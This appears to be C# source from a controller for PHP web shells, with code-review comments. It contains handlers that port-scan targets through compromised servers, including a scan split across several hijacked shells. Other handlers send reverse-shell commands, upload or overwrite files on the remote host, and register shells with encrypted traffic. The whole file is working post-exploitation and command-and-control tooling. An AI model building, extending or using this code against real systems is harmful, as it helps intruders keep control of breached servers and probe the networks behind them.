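/// <summary>
/// Click handler for the port-scan button: validates the target, builds the PHP
/// port list, and passes the generated scanner code for the current shell to
/// BantamMain.ExecutePHPCodeDisplayInRichTextBox.
/// </summary>
/// <param name="sender">Control that raised the event (not used).</param>
/// <param name="e">Event data (not used).</param>
private async void btnScan_Click(object sender, EventArgs e)
{
    if (btnScan.Enabled == false)
    {
        return;
    }

    string target = textBoxHost.Text;

    // Reject an empty target, or one that is neither an IPv4 address nor a URI.
    // The earlier condition joined all three tests with &&, so it could only be
    // true for an empty string and any other text reached PhpBuilder.PortScanner
    // without being validated.
    if (string.IsNullOrEmpty(target)
        || (!Helper.IsValidIPv4(target) && !Helper.IsValidUri(target)))
    {
        labelDynStatus.Text = "Invalid IP/Url.";
        return;
    }

    btnScan.Enabled = false;

    // Single lookup instead of ContainsKey followed by two indexer reads.
    if (BantamMain.Shells.TryGetValue(ShellUrl, out var shell))
    {
        string portsCode = string.Empty;
        bool encryptResponse = shell.ResponseEncryption;
        int responseEncryptionMode = shell.ResponseEncryptionMode;

        // Only text that parses as an integer is placed inside the PHP array literal.
        if (int.TryParse(textBoxPorts.Text, out _))
        {
            if (!string.IsNullOrEmpty(textBoxPorts.Text))
            {
                portsCode = "$ports = array('" + textBoxPorts.Text + "');";
                labelDynStatus.Text = "";
            }
            else
            {
                // NOTE(review): this branch is kept as written but cannot run:
                // int.TryParse has already failed for empty text, so the preset
                // list selected in comboBoxCommonPorts is never used.
                if (comboBoxCommonPorts.SelectedIndex != 0)
                {
                    if (comboBoxCommonPorts.SelectedIndex == (int)PORTS_OPTIONS.ONE_TO_1024)
                    {
                        portsCode = PhpBuilder.PortsScannerPorts1To1024();
                        labelDynStatus.Text = "** May fail unless on local IP";
                    }
                    else if (comboBoxCommonPorts.SelectedIndex == (int)PORTS_OPTIONS.COMMON_PORTS)
                    {
                        labelDynStatus.Text = "** May fail unless on local IP";
                        portsCode = PhpBuilder.PortScannerPortsCommon();
                    }
                    else if (comboBoxCommonPorts.SelectedIndex == (int)PORTS_OPTIONS.ALL_PORTS)
                    {
                        portsCode = PhpBuilder.PortScannerPortsAll();
                        labelDynStatus.Text = "** May fail unless on local IP";
                    }
                }
            }

            string phpCode = PhpBuilder.PortScanner(target, portsCode, encryptResponse);

            // NOTE(review): the call is not awaited; if it returns a Task, the
            // button is re-enabled below before the result arrives - confirm.
            BantamMain.ExecutePHPCodeDisplayInRichTextBox(ShellUrl, phpCode, "Opened Ports - " + target, encryptResponse, responseEncryptionMode);
        }
    }

    btnScan.Enabled = true;
}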
/// <summary>
/// Task wrapper for the reverse-shell request without chankro: wraps
/// <paramref name="shellCode"/> with PhpBuilder.ExecuteSystemCode, submits it through
/// WebRequestHelper.ExecuteRemotePHP from a Task.Run delegate, and optionally
/// writes the attempt to the shell log.
/// </summary>
/// <param name="shellCode">Command text passed to PhpBuilder.ExecuteSystemCode and copied into the log entry.</param>
private async Task PopReverseShell(string shellCode)
{
    string wrappedPhp = PhpBuilder.ExecuteSystemCode(shellCode, false);

    // NOTE(review): the delegate returns the value of ConfigureAwait(false), not a
    // Task, so this await presumably finishes once the request has been started
    // rather than when it completes - confirm against ExecuteRemotePHP's return type.
    await Task.Run(() => WebRequestHelper.ExecuteRemotePHP(ShellUrl, wrappedPhp, true).ConfigureAwait(false));

    if (!checkBoxLogShellCode.Checked)
    {
        return;
    }

    // NOTE(review): the message says "chankro" while the summary describes the
    // path without it; the text is kept verbatim. The full shellCode is logged.
    LogHelper.AddShellLog(ShellUrl, $"Attempted to pop chankro reverse shell with [ {shellCode} ] ", LogHelper.LOG_LEVEL.REQUESTED);
}
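/// <summary>
/// Click handler for the upload button: base64-encodes either the editor text or
/// the selected local file, wraps it in a PhpBuilder file-write statement, sends it
/// with WebRequestHelper.ExecuteRemotePHP and closes the form.
/// </summary>
/// <param name="sender">Control that raised the event (not used).</param>
/// <param name="e">Event data (not used).</param>
private async void btnUpload_Click(object sender, EventArgs e)
{
    btnBrowse.Enabled = false;
    btnUpload.Enabled = false;
    richTextBox1.Enabled = false;

    // try/finally restores all three controls on every exit. Previously the
    // "empty data" returns re-enabled only btnUpload, and an exception (for example
    // from File.ReadAllBytes) left the whole form disabled.
    try
    {
        string phpCode;

        if (EditingSelf)
        {
            if (string.IsNullOrEmpty(richTextBox1.Text))
            {
                LogHelper.AddShellLog(ShellUrl, "Attempted to upload empty file/data to self...", LogHelper.LOG_LEVEL.INFO);
                return;
            }

            string encodedSelf = Helper.EncodeBase64ToString(richTextBox1.Text);
            phpCode = PhpBuilder.WriteFileVar(PhpBuilder.phpServerScriptFileName, encodedSelf);
        }
        else
        {
            string encodedData;

            // A selected local file takes precedence over text typed into the editor.
            if (!string.IsNullOrEmpty(LocalFileLocation))
            {
                encodedData = Convert.ToBase64String(File.ReadAllBytes(LocalFileLocation));
            }
            else if (!string.IsNullOrEmpty(richTextBox1.Text))
            {
                encodedData = Helper.EncodeBase64ToString(richTextBox1.Text);
            }
            else
            {
                LogHelper.AddShellLog(ShellUrl, "Attempted to upload empty file/data...", LogHelper.LOG_LEVEL.INFO);
                return;
            }

            // The file name is taken from the text box as typed; it is not checked here.
            string remoteFileLocation = ServerPath + "/" + txtBoxFileName.Text;
            phpCode = PhpBuilder.WriteFile(remoteFileLocation, encodedData);
        }

        await WebRequestHelper.ExecuteRemotePHP(ShellUrl, phpCode);
    }
    finally
    {
        btnUpload.Enabled = true;
        btnBrowse.Enabled = true;
        richTextBox1.Enabled = true;
    }

    // Reached only after the request was awaited without an exception.
    this.Close();
}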
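/// <summary>
/// Click handler for the distributed scan: validates the target and port range,
/// divides the range between the checked shells and sends each one a
/// PhpBuilder.PortScanner request whose output goes to a shared RichTextBox dialog.
/// </summary>
/// <param name="sender">Control that raised the event (not used).</param>
/// <param name="e">Event data (not used).</param>
private async void btnScan_Click(object sender, EventArgs e)
{
    string target = textBoxTarget.Text;
    if (string.IsNullOrEmpty(target)
        || (!Helper.IsValidIPv4(target) && !Helper.IsValidUri(target)))
    {
        lblStatus.Text = "Invalid IP/Url.";
        return;
    }

    // TryParse replaces Convert.ToInt32 so that non-numeric text shows
    // "Invalid port." instead of throwing FormatException out of an async void
    // handler. Empty text fails TryParse too, which covers the old empty check.
    if (!int.TryParse(textBoxStartPort.Text, out int startPort)
        || !int.TryParse(textBoxEndPort.Text, out int endPort)
        || startPort > endPort || endPort <= 0 || startPort <= 0
        || startPort > PORT_MAX || endPort > PORT_MAX)
    {
        lblStatus.Text = "Invalid port.";
        return;
    }

    // With nothing checked the division below used to throw DivideByZeroException.
    int shellsCount = checkedListBoxShells.CheckedItems.Count;
    if (shellsCount == 0)
    {
        lblStatus.Text = "No shells selected.";
        return;
    }

    btnScan.Enabled = false;
    try
    {
        string windowTitle = "Open Ports ( " + target + " )";
        RichTextBox rtb = GuiHelper.RichTextBoxDialog(windowTitle, string.Empty);

        int portsPerShell = (endPort - startPort) / shellsCount;
        int iter = 1;

        foreach (var checkedItem in checkedListBoxShells.CheckedItems)
        {
            // NOTE(review): the arithmetic is kept exactly as written. Slice
            // boundaries are multiples of portsPerShell without startPort added,
            // so they do not follow the requested range when startPort is above 1.
            int rangeStart = (iter == 1) ? startPort : ((iter - 1) * portsPerShell) + 1;
            int rangeEnd = (iter == shellsCount) ? endPort : iter * portsPerShell;

            string scannedRange = rangeStart.ToString() + ", " + rangeEnd.ToString();
            string portsCode = "$ports = range(" + scannedRange + ");";

            bool encryptResponse = true;
            string shellUrl = checkedListBoxShells.GetItemText(checkedItem);
            string responseText = "[" + shellUrl + "] - returned ports (" + scannedRange + ") - \r\n";
            string phpCode = PhpBuilder.PortScanner(target, portsCode, encryptResponse);

            lblStatus.Text = "Scanning.";
            BantamMain.ExecutePHPCodeDisplayInRichTextBox(shellUrl, phpCode, windowTitle, encryptResponse, (int)CryptoHelper.RESPONSE_ENCRYPTION_TYPES.OPENSSL, false, rtb, responseText);

            iter++;
        }
    }
    finally
    {
        // Previously set inside the loop; now done once, and also when a request throws.
        btnScan.Enabled = true;
    }
}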
/// <summary>
/// Click handler that registers a shell URL in BantamMain.Shells with the
/// request/response options chosen in the dialog, then sends a test request and
/// keeps the entry only if the (optionally decrypted) reply is exactly "1".
/// </summary>
/// <param name="sender">Control that raised the event (not used).</param>
/// <param name="e">Event data (not used).</param>
private async void btnAddShell_Click(object sender, EventArgs e)
{
    string shellURL = txtBoxShellUrl.Text;
    if (string.IsNullOrEmpty(shellURL))
    {
        return;
    }

    bool encryptRequest = checkBoxEncryptRequest.Checked;

    // Length checks on the request key and IV before anything is stored.
    if (encryptRequest)
    {
        if (textBoxEncrpytionKey.Text.Length != 32)
        {
            labelDynAddHostsStatus.Text = "Encryption key length must be 32 chars... Try again.";
            return;
        }

        if (!checkBoxSendIVInRequest.Checked)
        {
            string fixedIv = textBoxEncrpytionIV.Text;
            if (string.IsNullOrEmpty(fixedIv) || fixedIv.Length != 16)
            {
                labelDynAddHostsStatus.Text = "Encryption IV length must be 16 chars... Try again.";
                return;
            }
        }
    }

    // An existing entry for the same URL is dropped from the GUI and the map first.
    if (BantamMain.Shells.ContainsKey(shellURL))
    {
        BantamMain.Instance.GuiCallbackRemoveShellURL(shellURL);

        bool removed = BantamMain.Shells.TryRemove(shellURL, out ShellInfo previousInfo);
        if (!removed)
        {
            LogHelper.AddGlobalLog("Unable to remove (" + shellURL + ") from shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR);
            return;
        }
    }

    bool added = BantamMain.Shells.TryAdd(shellURL, new ShellInfo());
    if (!added)
    {
        LogHelper.AddGlobalLog("Unable to add (" + shellURL + ") to shells", "AddShell failure", LogHelper.LOG_LEVEL.ERROR);
        return;
    }

    // Fetch the stored entry once and configure it through this reference.
    ShellInfo shell = BantamMain.Shells[shellURL];

    shell.RequestArgName = txtBoxArgName.Text;

    if (comboBoxVarType.Text == "cookie")
    {
        shell.SendDataViaCookie = true;
    }

    bool wantsEncryptedResponse = checkBoxResponseEncryption.Checked;
    shell.ResponseEncryption = wantsEncryptedResponse;
    if (wantsEncryptedResponse)
    {
        shell.ResponseEncryptionMode = comboBoxEncryptionMode.SelectedIndex;
    }

    shell.GzipRequestData = checkBoxGZipRequest.Checked;

    bool encryptResponse = shell.ResponseEncryption;
    int responseEncryptionMode = shell.ResponseEncryptionMode;

    if (encryptRequest)
    {
        shell.RequestEncryption = true;
        shell.RequestEncryptionKey = textBoxEncrpytionKey.Text;

        if (checkBoxSendIVInRequest.Checked)
        {
            // The IV goes in the request under the named variable; none is stored.
            shell.SendRequestEncryptionIV = true;
            shell.RequestEncryptionIV = string.Empty;
            shell.RequestEncryptionIVRequestVarName = textBoxIVVarName.Text;
        }
        else
        {
            shell.RequestEncryptionIV = textBoxEncrpytionIV.Text;
            shell.RequestEncryptionIVRequestVarName = string.Empty;
        }
    }
    else
    {
        shell.RequestEncryption = false;
        shell.RequestEncryptionIVRequestVarName = string.Empty;
        shell.RequestEncryptionIV = string.Empty;
        shell.RequestEncryptionKey = string.Empty;
    }

    // Shared failure path: show the status text and drop the entry added above.
    void RejectShell()
    {
        labelDynAddHostsStatus.Text = "Unable to connect, check your settings and try again.";
        BantamMain.Shells.TryRemove(shellURL, out ShellInfo discarded);
    }

    string phpCode = PhpBuilder.PhpTestExecutionWithEcho1(encryptResponse);
    ResponseObject response = await WebRequestHelper.ExecuteRemotePHP(shellURL, phpCode);

    if (string.IsNullOrEmpty(response.Result))
    {
        RejectShell();
        return;
    }

    string result = encryptResponse
        ? CryptoHelper.DecryptShellResponse(response.Result, response.EncryptionKey, response.EncryptionIV, responseEncryptionMode)
        : response.Result;

    // Null and empty also differ from "1", so one comparison covers all failures.
    if (result != "1")
    {
        RejectShell();
        return;
    }

    BantamMain.Instance.InitializeShellData(shellURL);
    this.Close();
}